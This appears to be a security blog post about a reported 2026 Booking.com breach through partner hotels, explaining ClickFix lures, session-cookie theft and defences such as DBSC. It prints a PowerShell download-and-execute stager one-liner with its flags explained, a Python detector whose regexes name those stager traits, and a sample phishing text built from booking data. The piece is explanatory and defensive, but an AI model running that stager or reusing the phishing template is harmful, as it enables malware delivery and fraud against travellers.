On April 13th 2026, the online travel agency Booking.com issued a major notification that echoed back to 2021: there had been unauthorized access to customer PII (Personally Identifiable Information). After the breach, their public relations team immediately stated that financial information was not accessed by the threat actors.
The breach most likely did not hit Booking.com’s core servers; it hit their supply chain. The supply chain in this case refers to the network of partner hotels connected to Booking.com. If the hackers can’t, or choose not to, hack the “big bank”, they go after its local branches. The threat actors likely used a tactic called ClickFix, in which they tricked hotel staff into running a malicious script under the guise of “fixing” a browser error; the script then steals their session cookies.

Session cookies are the digital ID inside your browser that keeps you logged in. When a hacker steals one, they bypass the need for a password and Multi-Factor Authentication completely.

To understand how the malware gets into a system we need to look at a stager. A stager is a small piece of code whose job is to download a malicious payload. The stager is the delivery tool for the harmful code; the malware is the harmful code that the stager downloads.
Disclaimer: The following code is purely for representation and provided with the intention of educational display.
```powershell
# CONCEPTUAL REPRESENTATION ONLY — educational purposes
# Modern EDR/AMSI solutions would flag and block this immediately.
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')"
```
-ExecutionPolicy Bypass: Tells the system to ignore local script restrictions.
iex (Invoke-Expression): A common "red flag" command that runs downloaded code directly in the computer's memory.
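As an added defensive example (not code from the article), the Python routine below scores PowerShell process-creation events for the stager traits described above: the -ExecutionPolicy Bypass flag, a hidden window, iex, a remote download, an encoded command, plus a launch from a ClickFix-style parent such as explorer.exe. The event field names and the three sample events are constructed assumptions, not real telemetry.

```python
import re
from dataclasses import dataclass, field

# One regex per trait of the stager pattern discussed above (case-insensitive, short aliases included).
STAGER_TRAITS = [
    ("exec_policy_bypass", re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I)),
    ("hidden_window",      re.compile(r"-(?:WindowStyle|w)\s+Hidden", re.I)),
    ("invoke_expression",  re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("remote_download",    re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I)),
    ("encoded_command",    re.compile(r"-(?:EncodedCommand|enc|e)\s+[A-Za-z0-9+/=]{20,}", re.I)),
]
# ClickFix lures end with the victim pasting into the Run dialog or a terminal,
# so these parents are suspicious launchers for a hidden PowerShell.
LURE_PARENTS = {"explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
ALERT_THRESHOLD = 3

@dataclass
class Verdict:
    pid: int
    score: int
    traits: list = field(default_factory=list)
    alert: bool = False

def score_event(event: dict) -> Verdict:
    """Score one process-creation event. Field names (pid, image, parent, cmdline) are
    assumptions; map them from Sysmon Event ID 1 or Windows 4688 in a real pipeline."""
    verdict = Verdict(pid=event["pid"], score=0)
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return verdict                       # only PowerShell launches are scored here
    for name, pattern in STAGER_TRAITS:
        if pattern.search(event["cmdline"]):
            verdict.traits.append(name)
            verdict.score += 1
    if event["parent"].lower() in LURE_PARENTS:
        verdict.traits.append("lure_parent:" + event["parent"].lower())
        verdict.score += 1
    verdict.alert = verdict.score >= ALERT_THRESHOLD
    return verdict

def triage(events: list) -> list:
    """Return verdicts for every event that crosses the alert threshold."""
    return [v for v in map(score_event, events) if v.alert]

# Constructed sample events: the stager from the article, a benign scheduled script,
# and an obfuscated variant using short flags and a placeholder -enc blob.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                "\"iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')\""},
    {"pid": 4188, "image": "powershell.exe", "parent": "svchost.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"},
    {"pid": 4201, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(f"ALERT pid={v.pid} score={v.score} traits={v.traits}")
```

The threshold keeps a lone -ExecutionPolicy Bypass from a legitimate admin script below the alert line while the combination of traits the article describes crosses it.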
Although only non-financial data was breached, it is still dangerous and a major threat. Attackers can take the stolen PII and build a lie that is hard to dismiss. Because the threat actor knows your check-in date, hotel name and other details of the reservation, you believe the message is real.
```json
{
  "guest_name": "Jane Smith",
  "booking_ref": "BK-99210",
  "check_in": "2026-05-14",
  "hotel_name": "Seaside Resort"
}
```

The message can look something like this: “Hi Jane, your booking BK-99210 for May 14th is at risk. Please verify your payment over here so we can save your booking details.”
Booking.com had a similar breach back in 2021 and was fined €475,000 under the General Data Protection Regulation (GDPR), a European law that can hit companies with massive fines if they lose customer or user data.
You do not have to be a tech giant such as Booking.com to be a target. Small businesses are often used, and have been used in the past, as a bridge to bigger targets or to their customers’ wallets. As you can see, this breach was not high-tech but rather simple: the humans were exploited alongside the companies’ data systems.

Tackling such session hijacking and supply chain vulnerabilities can consist of many measures. First, ensure that your web applications support Device Bound Session Credentials (DBSC). DBSC cryptographically binds a session to the device’s Trusted Platform Module (TPM); because the private key never leaves that hardware, a cookie exfiltrated to another machine cannot keep the session alive, and the session becomes invalid. Another good measure is enabling PowerShell Constrained Language Mode and blocking the -ExecutionPolicy Bypass flag for non-admin users.
A good takeaway from this breach: if you wait for the attack to develop before you secure your systems and partners, you have already lost the battle. Defense must begin while everything is still quiet.